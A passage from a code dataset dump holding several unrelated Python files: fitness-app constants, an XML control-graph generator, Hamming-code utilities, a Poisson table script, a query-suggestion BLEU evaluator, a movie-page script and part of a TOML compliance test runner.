\"goal\"\nGOAL_DATE_KEY = \"goal_date\"\nGOAL_SWIM_DISTANCE_KEY = \"goal_swim_distance\"\nGOAL_BIKE_DISTANCE_KEY = \"goal_bike_distance\"\nGOAL_RUN_DISTANCE_KEY = \"goal_run_distance\"\nGOAL_FITNESS_KEY = \"Fitness\"\nGOAL_5K_RUN_KEY = \"5K Run\"\nGOAL_10K_RUN_KEY = \"10K Run\"\nGOAL_15K_RUN_KEY = \"15K Run\"\nGOAL_HALF_MARATHON_RUN_KEY = \"Half Marathon\"\nGOAL_MARATHON_RUN_KEY = \"Marathon\"\n\n# Used by the workout plan generator\nLONGEST_RUN_IN_FOUR_WEEKS_KEY = \"Longest Run In Four Weeks\"\nAGE_YEARS_KEY = \"Age In Years\"\nEXPERIENCE_LEVEL_KEY = \"Experience Level\"\nWEEKS_UNTIL_GOAL_KEY = \"Weeks Until Goal\"\n\n# Used to track deferred tasks\nDEFERRED_TASKS_USER_ID = \"user_id\"\nTASKS_KEY = \"tasks\"\nTASK_ID_KEY = \"task id\"\nTASK_TYPE_KEY = \"task type\"\nTASK_DETAILS_KEY = \"task details\"\nTASK_STATE_KEY = \"task state\"\nIMPORT_TASK_KEY = \"import\"\nANALYSIS_TASK_KEY = \"analysis\"\nWORKOUT_PLAN_TASK_KEY = \"workout plan\"\n\n# Things associated with deferred tasks\nLOCAL_FILE_NAME = \"local file name\"\n\nTIME_KEYS = [ BEST_1K, BEST_MILE, BEST_5K, BEST_10K, BEST_15K, BEST_HALF_MARATHON, BEST_MARATHON, BEST_METRIC_CENTURY, BEST_CENTURY ]\nDISTANCE_KEYS = [ TOTAL_DISTANCE, LONGEST_DISTANCE ]\nSPEED_KEYS = [ APP_CURRENT_SPEED_KEY, APP_AVG_SPEED_KEY, APP_MOVING_SPEED_KEY, APP_SPEED_VARIANCE_KEY, BEST_SPEED, APP_AVG_SPEED_KEY ]\nPACE_KEYS = [ APP_CURRENT_PACE_KEY, BEST_PACE, AVG_PACE, LONG_RUN_PACE, EASY_RUN_PACE, TEMPO_RUN_PACE, SPEED_RUN_PACE, INTERVAL_PACE_KEY ]\nPOWER_KEYS = [ AVG_POWER, MAX_POWER, BEST_5_SEC_POWER, BEST_12_MIN_POWER, BEST_20_MIN_POWER, BEST_1_HOUR_POWER, NORMALIZED_POWER, THRESHOLD_POWER ]\nHEART_RATE_KEYS = [ AVG_HEART_RATE, MAX_HEART_RATE ]\nCADENCE_KEYS = [ APP_CADENCE_KEY, AVG_CADENCE, MAX_CADENCE ]\nGOALS = [ GOAL_FITNESS_KEY, GOAL_5K_RUN_KEY, GOAL_10K_RUN_KEY, GOAL_15K_RUN_KEY, GOAL_HALF_MARATHON_RUN_KEY, GOAL_MARATHON_RUN_KEY ]\n\nUNSUMMARIZABLE_KEYS = [ APP_SPEED_VARIANCE_KEY, APP_DISTANCES_KEY, APP_LOCATIONS_KEY, ACTIVITY_TIME_KEY, ACTIVITY_TYPE_KEY, ACTIVITY_HASH_KEY, ACTIVITY_LOCATION_DESCRIPTION_KEY, ACTIVITY_INTERVALS, MILE_SPLITS, KM_SPLITS ]\n","sub_path":"Keys.py","file_name":"Keys.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302265000","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport fileinput\nimport os\nimport re\nfrom pathlib import Path\n\ndef get_args():\n if len( sys.argv ) != 5:\n raise IOError(\"Must get: 1. Control graph; 2. Configuration file; 3. Source PLPs folder; 4. Tree depth.\")\n\n #\n file_control_graph_input_path = sys.argv[1]\n print( \"argument: file_control_graph_input_path : \" + file_control_graph_input_path )\n\n\n file_configuration_input_path = sys.argv[2]\n print( \"argument: file_configuration_input_path : \" + file_configuration_input_path )\n\n plps_path = sys.argv[3]\n print( \"argument: file_source_plp_input_path : \" + plps_path )\n\n depth_number = int(sys.argv[4])\n\n if os.path.exists(file_control_graph_input_path):\n print( \"found: file_control_graph_input_path : \" + file_control_graph_input_path )\n file_control_graph_input = open( file_control_graph_input_path, 'r+' )\n else:\n raise ImportError( \"file_control_graph_input_path file does not exists: \" + file_control_graph_input_path )\n\n if os.path.exists(file_configuration_input_path):\n print( \"found: file_configuration_input_path : \" + file_configuration_input_path )\n file_configuration_input = open( file_configuration_input_path, 'r+' )\n else:\n raise ImportError( \"file_configuration_input_path file does not exists: \" + file_configuration_input_path )\n\n if os.path.exists(plps_path):\n print( \"found: plps_path : \" + plps_path )\n #file_source_plp_input = open( file_source_plps_input_path, 'rt' )\n else:\n raise ImportError( \"plps_path folder does not exists: \" + plps_path )\n\n ''' \n plp_name = re.search(\"(.*/)([^/]*)\\.xml\",\n file_source_plps_input_path, re.DOTALL)\n \n if ( None != plp_name ):\n plps_path = plp_name[1]\n plp_name = plp_name[2]\n print(\"plps_path: \" + plps_path)\n print(\"plp_name: \" + plp_name)\n '''\n\n return file_control_graph_input, file_configuration_input, plps_path, depth_number\n\ndef open_plp( plps_directory, plp_name):\n path_to_plp = os.path.join( plps_directory, plp_name )\n if os.path.exists(path_to_plp):\n print( \"open plp : \" + path_to_plp )\n plp_file = open( path_to_plp, 'rt' )\n else:\n raise ImportError( \"can not openplp: \" + path_to_plp )\n\n return plp_file\n\ndef create_probability_tree( depth, root_index, free_index, list_leafs_indexes, text ):\n if depth < 1:\n return [ free_index, text ]\n\n elif depth == 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n '\\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n list_leafs_indexes.append(reserved_couple_indexes)\n list_leafs_indexes.append(reserved_couple_indexes+1)\n return [ free_index+2, text ]\n\n elif depth >= 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n '\\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes, free_index + 2, list_leafs_indexes, text)\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes + 1, free_index, list_leafs_indexes, text)\n\n return [ free_index, text ]\n\n\ndef main( single_node = True ):\n if sys.version_info[0] < 3: # Python 2 needs utf-8\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n file_control_graph_input, file_configuration_input, plps_path, depth_number = get_args()\n\n plps_to_delete = [\"achieve_false_0*.xml\", \"achieve_true_0*.xml\", \"maintain_0*.xml\", \"observe_0*.xml\"]\n for plp_to_delete in plps_to_delete:\n for file_path in Path(plps_path).glob(plp_to_delete):\n print(\"remove: \" + str(file_path))\n os.remove(file_path)\n\n plp_name_achieve_false = \"achieve_false_xml\"\n plp_name_achieve_true = \"achieve_true_xml\"\n plp_name_maintain = \"maintain_xml\"\n plp_name_observe = \"observe_xml\"\n plp_file_achieve_false = open_plp(plps_path, plp_name_achieve_false)\n plp_file_achieve_true = open_plp(plps_path, plp_name_achieve_true)\n plp_file_maintain = open_plp(plps_path, plp_name_maintain)\n plp_file_observe = open_plp(plps_path, plp_name_observe)\n plp_text_achieve_false = plp_file_achieve_false.read()\n plp_text_achieve_true = plp_file_achieve_true.read()\n plp_text_maintain = plp_file_maintain.read()\n plp_text_observe = plp_file_observe.read()\n\n control_graph_input_text = file_control_graph_input.read()\n\n sub_flags = re.MULTILINE | re.DOTALL\n\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n\n control_graph_input_text = re.sub(r']*\"/>', '', control_graph_input_text )\n\n text_for_configuration_variables = \"\"\n text_for_configuration_parameters = \"\"\n\n control_graph_text = \"\"\n nodes_counter = 0\n list_leafs_indexes = []\n nodes_counter, control_graph_text = create_probability_tree( depth_number, nodes_counter, nodes_counter + 1, list_leafs_indexes, control_graph_text)\n\n\n for root_index in list_leafs_indexes:\n node_maintain_index = nodes_counter\n plp_maintain_index = nodes_counter + 1\n node_sequential_observe = nodes_counter + 2\n plp_observe_index = nodes_counter + 3\n node_condition_index = nodes_counter + 4\n node_sequential_achieve_true_index = nodes_counter + 5\n node_sequential_achieve_false_index = nodes_counter + 6\n plp_achieve_true_index = nodes_counter + 7\n plp_achieve_false_index = nodes_counter + 8\n\n control_graph_text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\n'\n '\\t\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '').format(node_concurrent_index=root_index,\n node_maintain_index = node_maintain_index,\n plp_maintain_index = plp_maintain_index,\n node_sequential_observe = node_sequential_observe,\n plp_observe_index = plp_observe_index,\n node_condition_index = node_condition_index,\n node_sequential_achieve_true_index = node_sequential_achieve_true_index,\n node_sequential_achieve_false_index = node_sequential_achieve_false_index,\n plp_achieve_true_index = plp_achieve_true_index,\n plp_achieve_false_index = plp_achieve_false_index)\n\n path_plp_observe = os.path.join( plps_path, \"observe_{plp_observe_index:08d}.xml\".format(plp_observe_index = plp_observe_index) )\n file_plp_observe = open(path_plp_observe, 'wt')\n current_plp_text_observe = plp_text_observe\n current_plp_text_observe = re.sub(r'\"observe_\"', '\"observe_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n current_plp_text_observe = re.sub(r'\"observe_goal_\"', '\"observe_goal_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n\n file_plp_observe.write( current_plp_text_observe )\n file_plp_observe.close()\n\n text_for_configuration_parameters += '\\n'.format(plp_observe_index = plp_observe_index)\n\n\n path_plp_maintain = os.path.join(plps_path, \"maintain_{plp_maintain_index:08d}.xml\".format(plp_maintain_index=plp_maintain_index))\n file_plp_maintain = open(path_plp_maintain, 'wt')\n current_plp_text_maintain = plp_text_maintain\n current_plp_text_maintain = re.sub(r'\"maintain_\"', '\"maintain_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintaining_\"', '\"maintaining_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_success_\"', '\"maintain_termination_success_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_failure_\"', '\"maintain_termination_failure_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n\n text_for_configuration_variables += ('\\n'\n '\\n'\n '\\n').format(plp_maintain_index=plp_maintain_index)\n\n file_plp_maintain.write(current_plp_text_maintain)\n file_plp_maintain.close()\n\n path_plp_achieve_true = os.path.join(plps_path, \"achieve_true_{plp_achieve_true_index:08d}.xml\".format(\n plp_achieve_true_index=plp_achieve_true_index))\n file_plp_achieve_true = open(path_plp_achieve_true, 'wt')\n current_plp_text_achieve_true = plp_text_achieve_true\n current_plp_text_achieve_true = re.sub(r'\"achieve_true_\"',\n '\"achieve_true_{plp_achieve_true_index:08d}\"'.format(\n plp_achieve_true_index=plp_achieve_true_index),\n current_plp_text_achieve_true)\n\n current_plp_text_achieve_true = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_true)\n\n\n file_plp_achieve_true.write(current_plp_text_achieve_true)\n file_plp_achieve_true.close()\n\n\n path_plp_achieve_false = os.path.join(plps_path, \"achieve_false_{plp_achieve_false_index:08d}.xml\".format(\n plp_achieve_false_index=plp_achieve_false_index))\n file_plp_achieve_false = open(path_plp_achieve_false, 'wt')\n current_plp_text_achieve_false = plp_text_achieve_false\n current_plp_text_achieve_false = re.sub(r'\"achieve_false_\"',\n '\"achieve_false_{plp_achieve_false_index:08d}\"'.format(\n plp_achieve_false_index=plp_achieve_false_index),\n current_plp_text_achieve_false)\n\n current_plp_text_achieve_false = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_false)\n\n file_plp_achieve_false.write(current_plp_text_achieve_false)\n file_plp_achieve_false.close()\n\n nodes_counter += 9\n\n configuration_input_text = file_configuration_input.read()\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n\n\n text_for_configuration_variables += ('\\n'\n '\\n' )\n # '\\n'\n # '\\n'\n # '\\n')\n\n #text_for_configuration_parameters += ('\\n')\n\n configuration_input_text = configuration_input_text.replace( \"\", text_for_configuration_variables + text_for_configuration_parameters + \"\" )\n\n file_configuration_input.truncate(0) # .*\n file_configuration_input.seek(0)\n file_configuration_input.write(configuration_input_text)\n\n\n control_graph_input_text = control_graph_input_text.replace( \"\", control_graph_text + \"\" )\n\n file_control_graph_input.truncate(0) # .*\n file_control_graph_input.seek(0)\n file_control_graph_input.write(control_graph_input_text)\n\n\n plp_file_achieve_false.close()\n plp_file_achieve_true.close()\n plp_file_maintain.close()\n plp_file_observe.close()\n file_configuration_input.close()\n file_control_graph_input.close()\n print(\"Done\")\n \n \nmain(True)\n\n# Run example:\n# ./create_tree.py control_graph.xml configurations.xml plps/ 10\n","sub_path":"Examples/example_comprehensive_test/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":17612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247561726","text":"v1 = [0,0,1,0,1,0,1]\nv2 = [1,1,0,0,1,0]\n\ndef Hamming_Distance():\n hd = 0\n if len(v1) != len(v2):\n print('These vectors are not the same length.')\n else:\n for i in range(len(v1)):\n if v1[i] != v2[i]:\n hd+=1\n \n print('The Hamming Distance is',hd)\n \n\ndef decimalToVector(i,l):\n number = bin(i)[2:]\n if l < len(number):\n print('The number of chosen bits is too little for this number.')\n else:\n vector = []\n if len(number) < l:\n d = l - len(bin(i)[2:])\n for i in range(d):\n vector.append('0')\n for i in range(len(vector)):\n vector[i] = int(vector[i])\n for i in range(len(number)):\n vector.append(int(number[i]))\n return(vector)\n\ndef vectorToDecimal(v):\n lst_v = []\n for items in v:\n lst_v.append(str(items))\n decimal = int((''.join(lst_v)),2)\n print('The decimal of this vector is',decimal)\n\n\nv = [1,1,1,0]\nG = [[1,1,1,0,0,0,0],[1,0,0,1,1,0,0],[0,1,0,1,0,1,0],[1,1,0,1,0,0,1]]\n\ndef vectorTimesMatrix(v,G):\n i = 0 \n m = 0 \n count = 0\n times = 0\n calc_vector = []\n if len(v) != len(G):\n print('Error: dimensions do not match')\n else:\n while i <= len(v):\n times += G[i][m] * v[i]\n i+=1\n if i == len(v):\n m+=1\n i=0\n count+=1\n if str(times) not in '0' and str(times) not in '1':\n times = int(bin(times)[-1])\n calc_vector.append(times)\n times = 0\n if count == len(G[0]):\n break\n print(calc_vector)\n\ndef MatrixGridPrint(G):\n for vector in G:\n row = []\n for digit in vector:\n row.append(str(digit))\n print(''.join(row))\n \n \n#function HammingG\n#input: a number r\n#output: G, the generator matrix of the (2^r-1,2^r-r-1) Hamming code\ndef hammingGeneratorMatrix(r):\n n = 2**r-1\n \n #construct permutation pi\n pi = []\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n\n #construct rho = pi^(-1)\n rho = []\n for i in range(n):\n rho.append(pi.index(i+1))\n\n #construct H'\n global H\n H = []\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n\n #construct G'\n GG = [list(i) for i in zip(*H)]\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n\n #apply rho to get Gtranpose\n G = []\n for i in range(n):\n G.append(GG[rho[i]])\n\n #transpose \n G = [list(i) for i in zip(*G)]\n MatrixGridPrint(G)\n \n\nm = [1,0,0,0] \ndef HammingEncoder():\n vectorTimesMatrix(m,G)\n\ndef HammingTranspose():\n HTranspose =[list(i) for i in zip(*G)]\n MatrixGridPrint(HTranspose)\n\n\n\n \n \n \n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.1.py","file_name":"ErrorCorrectingV1.1.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"477094492","text":"#10-14-21 KYGM\n#App that returns poisson probability distribution table\n#complete\n\nimport math\n\ncont = 1\n \n# Returns factorial of n\ndef fact(n):\n \n res = 1\n \n for i in range(2, n+1):\n res = res * i\n \n return res\n\n#Returns PPD\ndef ppd(lbd,t,x):\n ppd = (((lbd*t)**x)/(fact(x)))*math.exp((-lbd)*t)\n return ppd\n\n#input constants\nlbd = input(\"Enter Lambda: \")\nt = input(\"Enter t: \")\nli = input(\"Enter list size: \")\n\n#casting\nlbd = float(lbd)\nt = int(t)\nli = int(li)\n\nwhile cont == 1:\n \n for i in range(li + 1):\n doge = ppd(lbd,t,i)\n print(i, \": \", doge)\n \n \n cont = input(\"Enter 1 for another or 0 to end: \")\n cont = int(cont)\n \n \n\n\n","sub_path":"PPDTable.py","file_name":"PPDTable.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"492637329","text":"###############################################################################\n# Author: Wasi Ahmad\n# Project: Neural Session Relevance Framework\n# Date Created: 7/29/2017\n#\n# File Description: This script evaluates test ranking performance.\n###############################################################################\n\nimport os, util, helper, data, multi_bleu, torch\nfrom torch.autograd import Variable\nfrom data import Session\nfrom model import NSRF\n\nargs = util.get_args()\n\n\ndef suggest_next_query(model, session_queries, session_query_length, dictionary):\n # query encoding\n embedded_queries = model.embedding(session_queries.view(-1, session_queries.size(-1)))\n encoded_queries = model.query_encoder(embedded_queries, session_query_length.view(-1).data.cpu().numpy())\n encoded_queries = model.apply_pooling(encoded_queries, model.config.pool_type)\n # encoded_queries: batch_size x session_length x (nhid_query * self.num_directions)\n encoded_queries = encoded_queries.view(*session_queries.size()[:-1], -1)\n\n # session level encoding\n sess_q_hidden = model.session_query_encoder.init_weights(encoded_queries.size(0))\n hidden_states, cell_states = [], []\n # loop over all the queries in a session\n for idx in range(encoded_queries.size(1)):\n # update session-level query encoder state using query representations\n sess_q_out, sess_q_hidden = model.session_query_encoder(encoded_queries[:, idx, :].unsqueeze(1), sess_q_hidden)\n # -1: only consider hidden states of the last layer\n if model.config.model == 'LSTM':\n hidden_states.append(sess_q_hidden[0][-1])\n cell_states.append(sess_q_hidden[1][-1])\n else:\n hidden_states.append(sess_q_hidden[0][-1])\n\n hidden_states = torch.stack(hidden_states, 1)\n hidden_states = hidden_states[:, -1, :].contiguous().view(-1, hidden_states.size(-1)).unsqueeze(0)\n if model.config.model == 'LSTM':\n cell_states = torch.stack(cell_states, 1)\n cell_states = cell_states[:, -1, :].contiguous().view(-1, cell_states.size(-1)).unsqueeze(0)\n decoder_hidden = (hidden_states, cell_states)\n else:\n decoder_hidden = hidden_states\n\n sos_token_index = dictionary.word2idx['']\n eos_token_index = dictionary.word2idx['']\n\n # First input of the decoder is the sentence start token\n decoder_input = Variable(torch.LongTensor([sos_token_index]))\n decoded_words = []\n for di in range(model.config.max_query_length + 1):\n if model.config.cuda:\n decoder_input = decoder_input.cuda()\n embedded_decoder_input = model.embedding(decoder_input).unsqueeze(1)\n decoder_output, decoder_hidden = model.decoder(embedded_decoder_input, decoder_hidden)\n topv, topi = decoder_output.data.topk(1)\n ni = topi[0][0]\n if ni == eos_token_index:\n break\n else:\n decoded_words.append(dictionary.idx2word[ni])\n decoder_input = Variable(torch.LongTensor([ni]))\n\n return \" \".join(decoded_words)\n\n\ndef evaluate(model, dictionary, session_queries):\n session = Session()\n session.queries = session_queries\n session_queries, session_query_length, rel_docs, rel_docs_length, doc_labels = helper.session_to_tensor(\n [session], dictionary, iseval=True)\n if model.config.cuda:\n session_queries = session_queries.cuda()\n session_query_length = session_query_length.cuda()\n return suggest_next_query(model, session_queries, session_query_length, dictionary)\n\n\nif __name__ == \"__main__\":\n dictionary = helper.load_object(args.save_path + 'dictionary.p')\n embeddings_index = helper.load_word_embeddings(args.word_vectors_directory, args.word_vectors_file,\n dictionary.word2idx)\n model = NSRF(dictionary, embeddings_index, args)\n if args.cuda:\n model = model.cuda()\n helper.load_model_states_from_checkpoint(model, os.path.join(args.save_path, 'model_best.pth.tar'), 'state_dict',\n args.cuda)\n print('model, embedding index and dictionary loaded.')\n model.eval()\n\n test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)\n test_corpus.parse(args.data + 'test.txt', args.max_example)\n print('test set size = ', len(test_corpus))\n\n targets, candidates = [], []\n fw = open(args.save_path + 'predictions_mmt.txt', 'w')\n for sess_len, sessions in test_corpus.data.items():\n for sess in sessions:\n for i in range(len(sess) - 1):\n target = evaluate(model, dictionary, sess.queries[:i + 1])\n candidate = \" \".join(sess.queries[i + 1].query_terms[1:-1])\n targets.append(target)\n candidates.append(candidate)\n inp = []\n for query in sess.queries[:i + 1]:\n inp.append(' '.join(query.query_terms[1:-1]))\n fw.write(', '.join(inp) + ' <:::> ' + candidate + ' <:::> ' + target + '\\n')\n fw.close()\n\n print(\"target size = \", len(targets))\n print(\"candidate size = \", len(candidates))\n multi_bleu.print_multi_bleu(targets, candidates)\n","sub_path":"multi_task_models/MNSRF/test_bleu.py","file_name":"test_bleu.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421608697","text":"import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a boy and his toys that come to life\",\n \"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n \"A paraplegic marine dispatched to the moon Pandora on a unique mission becomes torn between following his orders and protecting the world he feels is his home.\",\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\n \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\namericanPsycho = media.Movie(\"American Psycho\",\n \"Patric Bateman 2 years old who believes in taking care of himself\",\n \"https://upload.wikimedia.org/wikipedia/en/6/63/Americanpsychoposter.jpg\",\n \"https://www.youtube.com/watch?v=RjKNbfA64EE\")\n\n'''\nTester Code:\nprint(toy_story.storyline)\navatar.show_trailer()\n'''\n\nmovies = [toy_story, avatar, americanPsycho]\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107339311","text":"#!/usr/bin/env python\n\"\"\"TOML compliance suite runner.\n\"\"\"\n\nimport argparse\nimport difflib\nimport json\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport textwrap\nfrom pathlib import Path\n\n\nclass Failed(Exception):\n \"\"\"Raised when a check fails for some reason\n\n :param reason:\n Textual reason, explaining why the test failed.\n :param cause:\n Exception, representing the reason for failure.\n :param diff:\n A tuple of 2 JSON-able objects, that should be presented as a diff.\n \"\"\"\n\n def __init__(self, reason, *, cause=None, diff=None):\n self.reason = reason\n\n if cause is not None:\n self.details = repr(cause)\n elif diff is not None:\n correct, got = diff\n correct_str = json.dumps(correct, indent=2, sort_keys=True)\n got_str = json.dumps(got, indent=2, sort_keys=True)\n\n diff_lines = difflib.ndiff(\n correct_str.splitlines(keepends=False),\n got_str.splitlines(keepends=False),\n )\n self.details = \"\\n\".join(diff_lines)\n else:\n self.details = None\n\n super().__init__(reason, self.details)\n\n\nclass JSONValidationError(Exception):\n \"\"\"Raised when the JSON data does not have valid types or values for the type.\n \"\"\"\n\n def __repr__(self):\n return str(self)\n\n\n# --------------------------------------------------------------------------------------\n# Colors\n# --------------------------------------------------------------------------------------\n_COLOR_ALLOWED = sys.stdout.isatty()\n# Handle optional Windows-ANSI support dependency (colorama)\nif _COLOR_ALLOWED and os.name == \"nt\":\n try:\n import colorama\n except ImportError:\n print(\n \"TIP: If you install https://pypi.org/project/colorama, this program \"\n \"will look much better.\"\n )\n _COLOR_ALLOWED = False\n else:\n colorama.init()\n\n_COLOR_NAMES = [\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\"]\n_COLOR_DICT = dict(zip(_COLOR_NAMES, range(8)))\n\n\ndef colored(s, *, fg=None, bg=None, bold=False):\n assert fg is not None or bg is not None\n if not _COLOR_ALLOWED:\n return s\n\n ansi_codes = []\n if bold:\n ansi_codes.append(1)\n if fg is not None:\n ansi_codes.append(_COLOR_DICT[fg] + 30)\n if bg is not None:\n ansi_codes.append(_COLOR_DICT[bg] + 40)\n\n parameters = \";\".join(map(str, ansi_codes))\n\n return f\"\\033[{parameters}m{s}\\033[0m\"\n\n\n# --------------------------------------------------------------------------------------\n# Filesystem interaction\n# --------------------------------------------------------------------------------------\nhere = Path(__file__).parent\n\n\ndef ensure_executable(path):\n if not os.path.isfile(path):\n raise FileNotFoundError(f\"Could not find file: {path}\")\n if not os.access(path, os.X_OK):\n raise PermissionError(f\"Not an executable file: {path}\")\n\n\ndef _locate_test_pairs():\n for path in sorted((here / \"invalid\").glob(\"*/*.toml\")):\n yield path, None\n for path in sorted((here / \"invalid\").glob(\"*/*.json\")):\n yield None, path\n\n for path in sorted((here / \"valid\").glob(\"*/*.toml\")):\n json_equivalent = path.with_suffix(\".json\")\n assert json_equivalent.exists(), f\"Missing: {json_equivalent}\"\n yield path, json_equivalent\n\n\ndef _filter_based_on_markers(pairs, markers):\n def marker_filter(pair):\n # No filtering if no markers given.\n if not markers:\n return True\n\n for m in markers:\n # Matches the name of the file (allows -m basic)\n if m in pair[0].stem:\n return True\n # Matches the name of the parent folder (allows -m array)\n if m == pair[0].parent.name:\n return True\n # Matches the name of the grandparent folder (allows -m invalid)\n if m == pair[0].parent.parent.name:\n return True\n return False\n\n yield from filter(marker_filter, pairs)\n\n\ndef get_test_pairs(markers):\n pairs = _locate_test_pairs()\n yield from _filter_based_on_markers(pairs, markers)\n\n\n# --------------------------------------------------------------------------------------\n# Input / Output Handling\n# --------------------------------------------------------------------------------------\ndef run_program(program, *, stdin, clean_exit):\n try:\n process = subprocess.run(\n [program], input=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n except OSError as error:\n raise Failed(f\"could not run: {program}\", cause=error)\n\n # For invalid Test Cases\n if clean_exit:\n if process.returncode:\n raise Failed(f\"Got a non-zero exit code: {process.returncode}\")\n if process.stderr:\n raise Failed(f\"Got stderr output!\", cause=process.stderr)\n else:\n if not process.returncode:\n raise Failed(\"Should have rejected input.\")\n\n return process.stdout\n\n\ndef validate_json(obj):\n # raise JSONValidationError(\"This is what the error looks like!\\nlol\")\n pass\n\n\ndef load_json(*, content, source):\n assert source in [\"decoder's output\", \"test case input\"]\n try:\n loaded = json.loads(content)\n except json.JSONDecodeError as error:\n raise Failed(f\"Could not parse {source} JSON\", cause=error)\n\n try:\n validate_json(loaded)\n except JSONValidationError as error:\n # Note that we're passing the error as 'details' here, since we want the string\n # representation (which gets formatted correctly).\n raise Failed(f\"Got incorrect JSON from {source}\", error=error)\n\n\n# --------------------------------------------------------------------------------------\n# Actual Compliance Checks\n# --------------------------------------------------------------------------------------\ndef test_decoder(toml_file, json_file, clean_exit, decoder):\n content = run_program(decoder, stdin=toml_file.read_bytes(), clean_exit=clean_exit)\n\n # For valid Test Cases\n correct_json = load_json(content=json_file.read_text(), source=\"test case input\")\n decoded_json = load_json(content=content, source=\"decoder's output\")\n\n if correct_json != decoded_json:\n raise Failed(\n \"Mismatch between expected JSON and decoded JSON.\",\n diff=(correct_json, decoded_json),\n )\n\n\ndef test_encoder(json_file, clean_exit, encoder, decoder):\n input_json = load_json(content=json_file.read_text(), source=\"test case input\")\n\n # Encode the input.\n result = run_program(encoder, stdin=json_file.read_bytes(), clean_exit=clean_exit)\n\n # Decode the result.\n decoded = run_program(decoder, stdin=result, clean_exit=True)\n\n # Check round-trip was same as original\n round_trip_json = load_json(content=decoded, source=\"decoder's output\")\n\n if input_json != round_trip_json:\n raise Failed(\n \"Mismatch between original JSON and encoded-decoded JSON.\",\n diff=(input_json, round_trip_json),\n )\n\n\n# --------------------------------------------------------------------------------------\n# Check Runners!\n# 